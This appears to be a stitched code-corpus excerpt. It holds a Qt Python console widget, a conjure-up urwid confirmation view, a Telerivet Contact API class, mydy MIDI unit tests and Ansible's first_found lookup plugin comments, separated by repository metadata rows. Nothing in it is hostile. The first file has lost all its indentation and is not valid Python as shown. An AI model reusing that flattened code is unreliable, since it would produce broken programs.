class Console(QTextEdit):
running = pyqtSignal()
running_done = pyqtSignal()
@property
def doc(self):
return self.document()
@property
def cursor(self):
return self.textCursor()
@property
def root_frame(self):
return self.doc.rootFrame()
def unhandled_exception(self, type, value, tb):
if type == KeyboardInterrupt:
return
try:
sio = StringIO.StringIO()
traceback.print_exception(type, value, tb, file=sio)
fe = sio.getvalue()
prints(fe)
try:
val = unicode(value)
except:
val = repr(value)
msg = '<b>%s</b>:'%type.__name__ + val
error_dialog(self, _('ERROR: Unhandled exception'), msg,
det_msg=fe, show=True)
except BaseException:
pass
def __init__(self,
prompt='>>> ',
continuation='... ',
parent=None):
QTextEdit.__init__(self, parent)
self.shutting_down = False
self.compiler = CommandCompiler()
self.buf = self.old_buf = []
self.history = History([''], dynamic.get('console_history', []))
self.prompt_frame = None
self.allow_output = False
self.prompt_frame_format = QTextFrameFormat()
self.prompt_frame_format.setBorder(1)
self.prompt_frame_format.setBorderStyle(QTextFrameFormat.BorderStyle_Solid)
self.prompt_len = len(prompt)
self.doc.setMaximumBlockCount(int(prefs['scrollback']))
self.lexer = PythonLexer(ensurenl=False)
self.tb_lexer = PythonTracebackLexer()
self.context_menu = cm = QMenu(self) # {{{
cm.theme = ThemeMenu(cm)
# }}}
self.formatter = Formatter(prompt, continuation, style=prefs['theme'])
p = QPalette()
p.setColor(p.Base, QColor(self.formatter.background_color))
p.setColor(p.Text, QColor(self.formatter.color))
self.setPalette(p)
self.key_dispatcher = { # {{{
Qt.Key_Enter : self.enter_pressed,
Qt.Key_Return : self.enter_pressed,
Qt.Key_Up : self.up_pressed,
Qt.Key_Down : self.down_pressed,
Qt.Key_Home : self.home_pressed,
Qt.Key_End : self.end_pressed,
Qt.Key_Left : self.left_pressed,
Qt.Key_Right : self.right_pressed,
Qt.Key_Backspace : self.backspace_pressed,
Qt.Key_Delete : self.delete_pressed,
} # }}}
motd = textwrap.dedent('''\
# Python {0}
# {1} {2}
'''.format(sys.version.splitlines()[0], __appname__,
__version__))
sys.excepthook = self.unhandled_exception
self.controllers = []
QTimer.singleShot(0, self.launch_controller)
with EditBlock(self.cursor):
self.render_block(motd)
def shutdown(self):
dynamic.set('console_history', self.history.serialize())
self.shutting_down = True
for c in self.controllers:
c.kill()
def contextMenuEvent(self, event):
self.context_menu.popup(event.globalPos())
event.accept()
# Controller management {{{
@property
def controller(self):
return self.controllers[-1]
def no_controller_error(self):
error_dialog(self, _('No interpreter'),
_('No active interpreter found. Try restarting the'
' console'), show=True)
def launch_controller(self, *args):
c = Controller(self)
c.write_output.connect(self.show_output, type=Qt.QueuedConnection)
c.show_error.connect(self.show_error, type=Qt.QueuedConnection)
c.interpreter_died.connect(self.interpreter_died,
type=Qt.QueuedConnection)
c.interpreter_done.connect(self.execution_done)
self.controllers.append(c)
def interpreter_died(self, controller, returncode):
if not self.shutting_down and controller.current_command is not None:
error_dialog(self, _('Interpreter died'),
_('Interpreter died while executing a command. To see '
'the command, click Show details'),
det_msg=controller.current_command, show=True)
def execute(self, prompt_lines):
c = self.root_frame.lastCursorPosition()
self.setTextCursor(c)
self.old_prompt_frame = self.prompt_frame
self.prompt_frame = None
self.old_buf = self.buf
self.buf = []
self.running.emit()
self.controller.runsource('\n'.join(prompt_lines))
def execution_done(self, controller, ret):
if controller is self.controller:
self.running_done.emit()
if ret: # Incomplete command
self.buf = self.old_buf
self.prompt_frame = self.old_prompt_frame
c = self.prompt_frame.lastCursorPosition()
c.insertBlock()
self.setTextCursor(c)
else: # Command completed
try:
self.old_prompt_frame.setFrameFormat(QTextFrameFormat())
except RuntimeError:
# Happens if enough lines of output that the old
# frame was deleted
pass
self.render_current_prompt()
# }}}
# Prompt management {{{
@dynamic_property
def cursor_pos(self):
doc = '''
The cursor position in the prompt has the form (row, col).
row starts at 0 for the first line
col is 0 if the cursor is at the start of the line, 1 if it is after
the first character, n if it is after the nth char.
'''
def fget(self):
if self.prompt_frame is not None:
pos = self.cursor.position()
it = self.prompt_frame.begin()
lineno = 0
while not it.atEnd():
bl = it.currentBlock()
if bl.contains(pos):
return (lineno, pos - bl.position())
it += 1
lineno += 1
return (-1, -1)
def fset(self, val):
row, col = val
if self.prompt_frame is not None:
it = self.prompt_frame.begin()
lineno = 0
while not it.atEnd():
if lineno == row:
c = self.cursor
c.setPosition(it.currentBlock().position())
c.movePosition(c.NextCharacter, n=col)
self.setTextCursor(c)
break
it += 1
lineno += 1
return property(fget=fget, fset=fset, doc=doc)
def move_cursor_to_prompt(self):
if self.prompt_frame is not None and self.cursor_pos[0] < 0:
c = self.prompt_frame.lastCursorPosition()
self.setTextCursor(c)
def prompt(self, strip_prompt_strings=True):
if not self.prompt_frame:
yield u'' if strip_prompt_strings else self.formatter.prompt
else:
it = self.prompt_frame.begin()
while not it.atEnd():
bl = it.currentBlock()
t = unicode(bl.text())
if strip_prompt_strings:
t = t[self.prompt_len:]
yield t
it += 1
def set_prompt(self, lines):
self.render_current_prompt(lines)
def clear_current_prompt(self):
if self.prompt_frame is None:
c = self.root_frame.lastCursorPosition()
self.prompt_frame = c.insertFrame(self.prompt_frame_format)
self.setTextCursor(c)
else:
c = self.prompt_frame.firstCursorPosition()
self.setTextCursor(c)
c.setPosition(self.prompt_frame.lastPosition(), c.KeepAnchor)
c.removeSelectedText()
c.setPosition(self.prompt_frame.firstPosition())
def render_current_prompt(self, lines=None, restore_cursor=False):
row, col = self.cursor_pos
cp = list(self.prompt()) if lines is None else lines
self.clear_current_prompt()
for i, line in enumerate(cp):
start = i == 0
end = i == len(cp) - 1
self.formatter.render_prompt(not start, self.cursor)
self.formatter.render(self.lexer.get_tokens(line), self.cursor)
if not end:
self.cursor.insertBlock()
if row > -1 and restore_cursor:
self.cursor_pos = (row, col)
self.ensureCursorVisible()
# }}}
# Non-prompt Rendering {{{
def render_block(self, text, restore_prompt=True):
self.formatter.render(self.lexer.get_tokens(text), self.cursor)
self.cursor.insertBlock()
self.cursor.movePosition(self.cursor.End)
if restore_prompt:
self.render_current_prompt()
def show_error(self, is_syntax_err, tb, controller=None):
if self.prompt_frame is not None:
# At a prompt, so redirect output
return prints(tb, end='')
try:
self.buf.append(tb)
if is_syntax_err:
self.formatter.render_syntax_error(tb, self.cursor)
else:
self.formatter.render(self.tb_lexer.get_tokens(tb), self.cursor)
except:
prints(tb, end='')
self.ensureCursorVisible()
QApplication.processEvents()
def show_output(self, raw, which='stdout', controller=None):
def do_show():
try:
self.buf.append(raw)
self.formatter.render_raw(raw, self.cursor)
except:
import traceback
prints(traceback.format_exc())
prints(raw, end='')
if self.prompt_frame is not None:
with Prepender(self):
do_show()
else:
do_show()
self.ensureCursorVisible()
QApplication.processEvents()
# }}}
# Keyboard management {{{
def keyPressEvent(self, ev):
text = unicode(ev.text())
key = ev.key()
action = self.key_dispatcher.get(key, None)
if callable(action):
action()
elif key in (Qt.Key_Escape,):
QTextEdit.keyPressEvent(self, ev)
elif text:
self.text_typed(text)
else:
QTextEdit.keyPressEvent(self, ev)
def left_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if pos > self.prompt_len:
c = self.cursor
c.movePosition(c.PreviousCharacter)
self.setTextCursor(c)
elif lineno > 0:
c = self.cursor
c.movePosition(c.Up)
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def up_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if lineno == 0:
b = self.history.back()
if b is not None:
self.set_prompt(b)
else:
c = self.cursor
c.movePosition(c.Up)
self.setTextCursor(c)
self.ensureCursorVisible()
def backspace_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if pos > self.prompt_len:
self.cursor.deletePreviousChar()
elif lineno > 0:
c = self.cursor
c.movePosition(c.Up)
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def delete_pressed(self):
self.cursor.deleteChar()
self.ensureCursorVisible()
def right_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
c = self.cursor
cp = list(self.prompt(False))
if pos < len(cp[lineno]):
c.movePosition(c.NextCharacter)
elif lineno < len(cp)-1:
c.movePosition(c.NextCharacter, n=1+self.prompt_len)
self.setTextCursor(c)
self.ensureCursorVisible()
def down_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
c = self.cursor
cp = list(self.prompt(False))
if lineno >= len(cp) - 1:
b = self.history.forward()
if b is not None:
self.set_prompt(b)
else:
c = self.cursor
c.movePosition(c.Down)
self.setTextCursor(c)
self.ensureCursorVisible()
def home_pressed(self):
if self.prompt_frame is not None:
mods = QApplication.keyboardModifiers()
ctrl = bool(int(mods & Qt.CTRL))
if ctrl:
self.cursor_pos = (0, self.prompt_len)
else:
c = self.cursor
c.movePosition(c.StartOfLine)
c.movePosition(c.NextCharacter, n=self.prompt_len)
self.setTextCursor(c)
self.ensureCursorVisible()
def end_pressed(self):
if self.prompt_frame is not None:
mods = QApplication.keyboardModifiers()
ctrl = bool(int(mods & Qt.CTRL))
if ctrl:
self.cursor_pos = (len(list(self.prompt()))-1, self.prompt_len)
c = self.cursor
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def enter_pressed(self):
if self.prompt_frame is None:
return
if not self.controller.is_alive:
return self.no_controller_error()
cp = list(self.prompt())
if cp[0]:
try:
ret = self.compiler('\n'.join(cp))
except:
pass
else:
if ret is None:
c = self.prompt_frame.lastCursorPosition()
c.insertBlock()
self.setTextCursor(c)
self.render_current_prompt()
return
else:
self.history.enter(cp)
self.execute(cp)
def text_typed(self, text):
if self.prompt_frame is not None:
self.move_cursor_to_prompt()
self.cursor.insertText(text)
self.render_current_prompt(restore_cursor=True)
self.history.current = list(self.prompt())
# }}}
| gpl-3.0 | -6,390,470,925,879,596,000 | 31.591522 | 83 | 0.54969 | false |
Ubuntu-Solutions-Engineering/conjure | conjureup/ui/views/destroy_confirm.py | 3 | 3999 | import datetime
from ubuntui.utils import Color, Padding
from ubuntui.widgets.buttons import menu_btn
from ubuntui.widgets.hr import HR
from ubuntui.widgets.text import Instruction
from urwid import Columns, Filler, Frame, Pile, Text, WidgetWrap
class DestroyConfirmView(WidgetWrap):
def __init__(self, app, controller, model, cb):
self.app = app
self.cb = cb
self.controller = controller
self.model = model
self.config = self.app.config
self.buttons_pile_selected = False
self.frame = Frame(body=self._build_widget(),
footer=self._build_footer())
self.frame.focus_position = 'footer'
self.buttons.focus_position = 1
super().__init__(self.frame)
def keypress(self, size, key):
if key in ['tab', 'shift tab']:
self._swap_focus()
return super().keypress(size, key)
def _swap_focus(self):
if not self.buttons_pile_selected:
self.buttons_pile_selected = True
self.frame.focus_position = 'footer'
self.buttons.focus_position = 1
else:
self.buttons_pile_selected = False
self.frame.focus_position = 'body'
def _build_footer(self):
no = menu_btn(on_press=self.cancel,
label="\n NO\n")
yes = menu_btn(on_press=self.submit,
label="\n YES\n")
self.buttons = Columns([
('fixed', 2, Text("")),
('fixed', 11, Color.menu_button(
no,
focus_map='button_primary focus')),
Text(""),
('fixed', 11, Color.menu_button(
yes,
focus_map='button_primary focus')),
('fixed', 2, Text(""))
])
self.footer = Pile([
Padding.line_break(""),
self.buttons
])
return Color.frame_footer(self.footer)
def _sanitize_date(self, date_obj):
""" Some cases juju uses human readable date/time like X secs ago and models
that run longer get a typical datetime.date object, need to make sure
of which one we're dealing with
Arguments:
date_obj: datetime.date object
Returns:
String representation of date or the Juju human readable string
if applicable
"""
if isinstance(date_obj, datetime.date):
return date_obj.strftime('%Y-%m-%d')
else:
return str(date_obj)
def _total_machines(self, model):
""" Returns total machines in model
"""
machines = model.get('machines', None)
if machines is None:
return 0
return len(machines.keys())
def _build_widget(self):
applications = self.app.juju.client.applications
total_items = [Instruction("Deployment Information:"), HR()]
tbl = Pile([
Columns([('fixed', 15, Text("Name")),
Text(self.model['name'])]),
Columns([('fixed', 15, Text("Cloud")),
Text(self.model['cloud'])]),
Columns([('fixed', 15, Text("Status")),
Text(self.model['status']['current'])]),
Columns([('fixed', 15, Text("Online")),
Text(self._sanitize_date(
self.model['status']['since']))]),
Columns([('fixed', 15, Text("Applications")),
Text(", ".join(applications.keys()))]),
Columns([('fixed', 15, Text("Machines")),
Text(str(self._total_machines(self.model)))])
])
total_items.append(tbl)
total_items.append(HR())
return Padding.center_80(Filler(Pile(total_items), valign='top'))
def submit(self, btn):
self.footer.contents[-1] = (Text(""), self.footer.options())
self.cb(self.controller, self.model['name'])
def cancel(self, btn):
self.cb(None, None)
| mit | 565,828,565,105,347,700 | 33.179487 | 84 | 0.540635 | false |
Telerivet/telerivet-python-client | telerivet/contact.py | 1 | 12556 | from .entity import Entity
class Contact(Entity):
"""
Fields:
- id (string, max 34 characters)
* ID of the contact
* Read-only
- name
* Name of the contact
* Updatable via API
- phone_number (string)
* Phone number of the contact
* Updatable via API
- time_created (UNIX timestamp)
* Time the contact was added in Telerivet
* Read-only
- time_updated (UNIX timestamp)
* Time the contact was last updated in Telerivet
* Read-only
- send_blocked (bool)
* True if Telerivet is blocked from sending messages to this contact
* Updatable via API
- conversation_status
* Current status of the conversation with this contact
* Allowed values: closed, active, handled
* Updatable via API
- last_message_time (UNIX timestamp)
* Last time the contact sent or received a message (null if no messages have been sent
or received)
* Read-only
- last_incoming_message_time (UNIX timestamp)
* Last time a message was received from this contact
* Read-only
- last_outgoing_message_time (UNIX timestamp)
* Last time a message was sent to this contact
* Read-only
- message_count (int)
* Total number of non-deleted messages sent to or received from this contact
* Read-only
- incoming_message_count (int)
* Number of messages received from this contact
* Read-only
- outgoing_message_count (int)
* Number of messages sent to this contact
* Read-only
- last_message_id
* ID of the last message sent to or received from this contact (null if no messages
have been sent or received)
* Read-only
- default_route_id
* ID of the phone or route that Telerivet will use by default to send messages to this
contact (null if using project default route)
* Updatable via API
- group_ids (array of strings)
* List of IDs of groups that this contact belongs to
* Read-only
- vars (dict)
* Custom variables stored for this contact
* Updatable via API
- project_id
* ID of the project this contact belongs to
* Read-only
"""
def isInGroup(self, group):
"""
Returns true if this contact is in a particular group, false otherwise.
Arguments:
- group (Group)
* Required
Returns:
bool
"""
self.load()
return group.id in self._group_ids_set
def addToGroup(self, group):
"""
Adds this contact to a group.
Arguments:
- group (Group)
* Required
"""
self._api.doRequest("PUT", group.getBaseApiPath() + "/contacts/" + self.id);
self._group_ids_set[group.id] = True
def removeFromGroup(self, group):
"""
Removes this contact from a group.
Arguments:
- group (Group)
* Required
"""
self._api.doRequest("DELETE", group.getBaseApiPath() + "/contacts/" + self.id)
if group.id in self._group_ids_set:
del self._group_ids_set[group.id]
def queryMessages(self, **options):
"""
Queries messages sent or received by this contact.
Arguments:
- direction
* Filter messages by direction
* Allowed values: incoming, outgoing
- message_type
* Filter messages by message_type
* Allowed values: sms, mms, ussd, call, service
- source
* Filter messages by source
* Allowed values: phone, provider, web, api, service, webhook, scheduled,
integration
- starred (bool)
* Filter messages by starred/unstarred
- status
* Filter messages by status
* Allowed values: ignored, processing, received, sent, queued, failed,
failed_queued, cancelled, delivered, not_delivered
- time_created[min] (UNIX timestamp)
* Filter messages created on or after a particular time
- time_created[max] (UNIX timestamp)
* Filter messages created before a particular time
- external_id
* Filter messages by ID from an external provider
- contact_id
* ID of the contact who sent/received the message
- phone_id
* ID of the phone (basic route) that sent/received the message
- broadcast_id
* ID of the broadcast containing the message
- scheduled_id
* ID of the scheduled message that created this message
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of Message)
"""
from .message import Message
return self._api.newApiCursor(Message, self.getBaseApiPath() + "/messages", options)
def queryGroups(self, **options):
"""
Queries groups for which this contact is a member.
Arguments:
- name
* Filter groups by name
* Allowed modifiers: name[ne], name[prefix], name[not_prefix], name[gte], name[gt],
name[lt], name[lte]
- dynamic (bool)
* Filter groups by dynamic/non-dynamic
- sort
* Sort the results based on a field
* Allowed values: default, name
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of Group)
"""
from .group import Group
return self._api.newApiCursor(Group, self.getBaseApiPath() + "/groups", options)
def queryScheduledMessages(self, **options):
"""
Queries messages scheduled to this contact (not including messages scheduled to groups that
this contact is a member of)
Arguments:
- message_type
* Filter scheduled messages by message_type
* Allowed values: sms, mms, ussd, call, service
- time_created (UNIX timestamp)
* Filter scheduled messages by time_created
* Allowed modifiers: time_created[ne], time_created[min], time_created[max]
- next_time (UNIX timestamp)
* Filter scheduled messages by next_time
* Allowed modifiers: next_time[ne], next_time[min], next_time[max],
next_time[exists]
- sort
* Sort the results based on a field
* Allowed values: default, name
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of ScheduledMessage)
"""
from .scheduledmessage import ScheduledMessage
return self._api.newApiCursor(ScheduledMessage, self.getBaseApiPath() + "/scheduled", options)
def queryDataRows(self, **options):
"""
Queries data rows associated with this contact (in any data table).
Arguments:
- time_created (UNIX timestamp)
* Filter data rows by the time they were created
* Allowed modifiers: time_created[ne], time_created[min], time_created[max]
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of DataRow)
"""
from .datarow import DataRow
return self._api.newApiCursor(DataRow, self.getBaseApiPath() + "/rows", options)
def queryServiceStates(self, **options):
"""
Queries this contact's current states for any service
Arguments:
- id
* Filter states by id
* Allowed modifiers: id[ne], id[prefix], id[not_prefix], id[gte], id[gt], id[lt],
id[lte]
- vars (dict)
* Filter states by value of a custom variable (e.g. vars[email], vars[foo], etc.)
* Allowed modifiers: vars[foo][ne], vars[foo][prefix], vars[foo][not_prefix],
vars[foo][gte], vars[foo][gt], vars[foo][lt], vars[foo][lte], vars[foo][min],
vars[foo][max], vars[foo][exists]
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of ContactServiceState)
"""
from .contactservicestate import ContactServiceState
return self._api.newApiCursor(ContactServiceState, self.getBaseApiPath() + "/states", options)
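# Illustrative usage of the query methods above (the `contact` variable and the
# filter values are assumptions, not defined in this module). Bracketed filter
# modifiers cannot be written as normal keyword arguments, so they can be
# supplied via dict unpacking:
#
#   cursor = contact.queryServiceStates(page_size=100, **{'vars[status][exists]': True})
#
# Each query method returns an APICursor over the matching objects, driven by
# the page_size/offset arguments documented above.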
def save(self):
"""
Saves any fields or custom variables that have changed for this contact.
"""
super(Contact, self).save()
def delete(self):
"""
Deletes this contact.
"""
self._api.doRequest("DELETE", self.getBaseApiPath())
def getBaseApiPath(self):
return "/projects/%(project_id)s/contacts/%(id)s" % {'project_id': self.project_id, 'id': self.id}
def _setData(self, data):
super(Contact, self)._setData(data)
self._group_ids_set = {}
if 'group_ids' in data:
for group_id in data['group_ids']:
self._group_ids_set[group_id] = True
| mit | -4,420,296,154,701,561,000 | 32.662198 | 107 | 0.505575 | false |
jameswenzel/mydy | tests/test.py | 1 | 9590 | '''
Tests for MIDI modules
'''
import unittest
import random
import math
from itertools import chain
# in the dev environment, mydy is known as src
import src as mydy
# from mydy import Util, FileIO, Events
# from mydy.Constants import MAX_TICK_RESOLUTION
Util = mydy.Util
FileIO = mydy.FileIO
Events = mydy.Events
Containers = mydy.Containers
MAX_TICK_RESOLUTION = mydy.Constants.MAX_TICK_RESOLUTION
class TestUtil(unittest.TestCase):
def test_symmetry(self):
for _ in range(1000):
test = random.randint(2 ** 16, 2 ** (64) - 1)
self.assertEqual(test, Util.read_varlen(
iter(Util.write_varlen(test))))
class TestFileIO(unittest.TestCase):
def test_write_read(self):
'''Test that write and read are inverses of each other'''
read = FileIO.read_midifile('mary.mid')
self.assertTrue(len(read[0]) > 0)
FileIO.write_midifile('test.mid', read)
self.assertEqual(read, FileIO.read_midifile('test.mid'))
read2 = read * (2 / 3)
FileIO.write_midifile('test.mid', read2)
class TestEvents(unittest.TestCase):
def test_constructors(self):
'''Test all constructors behave as expected'''
for _, cls in chain(Events.EventRegistry.Events.items(),
Events.EventRegistry.MetaEvents.items()):
cls(metacommand=1, tick=1, data=[1])
def test_add_event(self):
'''Test that events support integer addition'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][5]
event2 = event + 1
self.assertNotEqual(event, event2)
self.assertEqual(event.pitch + 1, event2.pitch)
event3 = event2 - 1
self.assertEqual(event, event3)
def test_shift_event(self):
'''Test that events support integer shift operations'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][5]
event2 = event >> 1
self.assertNotEqual(event, event2)
self.assertEqual(event.velocity + 1, event2.velocity)
event3 = event2 << 1
self.assertEqual(event, event3)
def test_mul_event(self):
'''Test that events support integer and float multiplication'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][20]
event * 1 # test ints are valid too
event2 = event * 2.2
self.assertNotEqual(event, event2)
self.assertEqual(event.tick * 2.2, event2.tick)
event3 = event2 / 2.2
self.assertAlmostEqual(event.tick, event3.tick)
class TestTracks(unittest.TestCase):
def test_add_track(self):
'''Test that tracks support integer addition'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track2 = track1 + 1
self.assertNotEqual(track1, track2)
track3 = track2 - 1
self.assertEqual(track1, track3)
def test_shift_track(self):
'''Test that tracks support integer shift operations'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track2 = track1 >> 1
self.assertNotEqual(track1, track2)
track3 = track2 << 1
self.assertEqual(track1, track3)
def test_mul_track(self):
'''Test that tracks support integer and float multiplication'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track1 * 1 # test ints are valid too
track2 = track1 * 2.2
self.assertNotEqual(track1, track2)
track3 = track2 / 2.2
# avoid failures due to float imprecision
for event in track3:
event.tick = int(event.tick)
self.assertAlmostEqual(track1, track3)
def test_pow_tracks(self):
'''Tracks support integer and float power operations'''
pattern = FileIO.read_midifile('sotw.mid')
track = pattern[0]
self.assertTrue(track.length * 2 == (track ** 2).length)
track42 = track ** 4.2
self.assertTrue(track.length * 4.2 == (track ** 4.2).length)
self.assertTrue(int(track.length * 4.2) == int((track ** 4.2).length))
def test_add_tracks(self):
'''Tracks can be added together to create a new object'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
copy = track1.copy()
self.assertTrue(len(track1) * 2 - 1 == len(track1 + track1))
combined = track1 + copy
self.assertTrue(track1[1] == combined[1] and
track1[1] is not combined[1])
def test_length_and_relative(self):
'''Length property works with both relative and absolute ticks.'''
pattern = FileIO.read_midifile('mary.mid')
self.assertEqual(pattern[0].length, 1)
running_tick = 0
for event in pattern[1]:
running_tick += event.tick
self.assertEqual(running_tick, pattern[1].length)
abscopy = pattern[1].copy()
abscopy.relative = False
# print(abscopy)
self.assertEqual(running_tick, abscopy.length)
def test_relative(self):
'''Test that relative setter and make_ticks_xxx methods work as expected,
i.e. methods return copies and the setter modifies in place '''
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
abscopy = track.copy()
abscopy2 = abscopy.make_ticks_abs()
self.assertTrue(abscopy is not abscopy2)
self.assertNotEqual(abscopy, abscopy2)
abscopy.relative = False
self.assertEqual(abscopy, abscopy2)
relcopy = abscopy.make_ticks_rel()
self.assertEqual(track, relcopy)
def test_merge(self):
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
# TODO: nudge/shift operator/method?
def shift_100(event):
event = event.copy()
event.tick += 100
return event
shifted = track.copy()
shifted[0].tick += 100
merged = track.merge(shifted)
self.assertTrue(track.merge(shifted).length == track.length + 100)
def test_map_attr(self):
# Map supports optional attr; attrs that are Event-specific
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
track = track.map(lambda e: 0, 'tick')
self.assertEqual(track.length, 0)
def change_tick(event):
event.tick = 0
return event
track = pattern[1].map(change_tick)
self.assertEqual(track.length, 0)
# not every event has a velocity attr
track = pattern[1].map(lambda e: 127, 'velocity')
self.assertEqual(track[5].velocity, 127)
track = pattern[1].make_ticks_abs().map(lambda e: e.tick ** 2, 'tick')
self.assertEqual(pattern[1].length ** 2, track.length)
def test_map_event_type(self):
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
print(track)
track = track.map(lambda e: 69, 'tick', Events.ControlChangeEvent)
self.assertEqual(track[0].tick, 69)
def change_tick(event):
event.tick = 0
return event
track = pattern[1].map(change_tick)
self.assertEqual(track.length, 0)
track = pattern[1].map(change_tick, event_type=Events.NoteOnEvent)
self.assertEqual(track.length, 1)
class TestPattern(unittest.TestCase):
def test_deep_eq(self):
'''Test that two pattern objects equal each other'''
read1 = FileIO.read_midifile('mary.mid')
read2 = FileIO.read_midifile('mary.mid')
self.assertEqual(read1, read2)
def test_add_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern2 = pattern1 + 1
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 - 1
self.assertEqual(pattern1, pattern3)
def test_shift_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern2 = pattern1 >> 1
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 << 1
self.assertEqual(pattern1, pattern3)
pattern1 >> 200
def test_mul_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern1 * 1 # test ints are valid too
pattern2 = pattern1 * 2.2
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 / 2.2
# avoid failures due to float imprecision
for track in pattern3:
for event in track:
event.tick = int(event.tick)
self.assertEqual(pattern1, pattern3)
def test_mul_symmetry(self):
orig = FileIO.read_midifile('mary.mid')
orig *= 1.1
FileIO.write_midifile('test.mid', orig)
orig.resolution = MAX_TICK_RESOLUTION
for track in orig:
for event in track:
event.tick = int(event.tick + .5)
read = FileIO.read_midifile('test.mid')
self.assertEqual(orig, read)
def test_add_patterns(self):
pattern = FileIO.read_midifile('mary.mid')
copy = pattern.copy()
self.assertTrue(len(pattern) * 2 == len(pattern + copy))
self.assertTrue(pattern == copy and pattern is not copy)
for track, trackcopy in zip(pattern, copy):
self.assertEqual(track, trackcopy)
self.assertFalse(track is trackcopy)
for event, eventcopy in zip(track, trackcopy):
self.assertEqual(event, eventcopy)
self.assertFalse(event is eventcopy)
| mit | 1,308,363,646,772,172,000 | 35.325758 | 81 | 0.611679 | false |
hlieberman/debian-ansible | lib/ansible/runner/lookup_plugins/first_found.py | 33 | 5953 | # (c) 2013, seth vidal <[email protected]> red hat, inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# take a list of files and (optionally) a list of paths
# return the first existing file found in the paths
# [file1, file2, file3], [path1, path2, path3]
# search order is:
# path1/file1
# path1/file2
# path1/file3
# path2/file1
# path2/file2
# path2/file3
# path3/file1
# path3/file2
# path3/file3
# first file found with os.path.exists() is returned
# no file matches raises ansibleerror
# EXAMPLES
# - name: copy first existing file found to /some/file
# action: copy src=$item dest=/some/file
# with_first_found:
# - files: foo ${inventory_hostname} bar
# paths: /tmp/production /tmp/staging
# that will look for files in this order:
# /tmp/production/foo
# ${inventory_hostname}
# bar
# /tmp/staging/foo
# ${inventory_hostname}
# bar
# - name: copy first existing file found to /some/file
# action: copy src=$item dest=/some/file
# with_first_found:
# - files: /some/place/foo ${inventory_hostname} /some/place/else
# that will look for files in this order:
# /some/place/foo
# $relative_path/${inventory_hostname}
# /some/place/else
# example - including tasks:
# tasks:
# - include: $item
# with_first_found:
# - files: generic
# paths: tasks/staging tasks/production
# this will include the tasks in the file generic where it is found first (staging or production)
# example simple file lists
#tasks:
#- name: first found file
# action: copy src=$item dest=/etc/file.cfg
# with_first_found:
# - files: foo.${inventory_hostname} foo
# example skipping if no matched files
# First_found also offers the ability to control whether or not failing
# to find a file returns an error or not
#
#- name: first found file - or skip
# action: copy src=$item dest=/etc/file.cfg
# with_first_found:
# - files: foo.${inventory_hostname}
# skip: true
# example a role with default configuration and configuration per host
# you can set multiple terms with their own files and paths to look through.
# consider a role that sets some configuration per host falling back on a default config.
#
#- name: some configuration template
# template: src={{ item }} dest=/etc/file.cfg mode=0444 owner=root group=root
# with_first_found:
# - files:
# - ${inventory_hostname}/etc/file.cfg
# paths:
# - ../../../templates.overwrites
# - ../../../templates
# - files:
# - etc/file.cfg
# paths:
# - templates
# the above will return an empty list if the files cannot be found at all
# if skip is unspecified or if it is set to false then it will return an
# error which can be caught by ignore_errors: true for that action.
# finally - if you want you can use it, in place to replace first_available_file:
# you simply cannot use the - files, path or skip options. simply replace
# first_available_file with with_first_found and leave the file listing in place
#
#
# - name: with_first_found like first_available_file
# action: copy src=$item dest=/tmp/faftest
# with_first_found:
# - ../files/foo
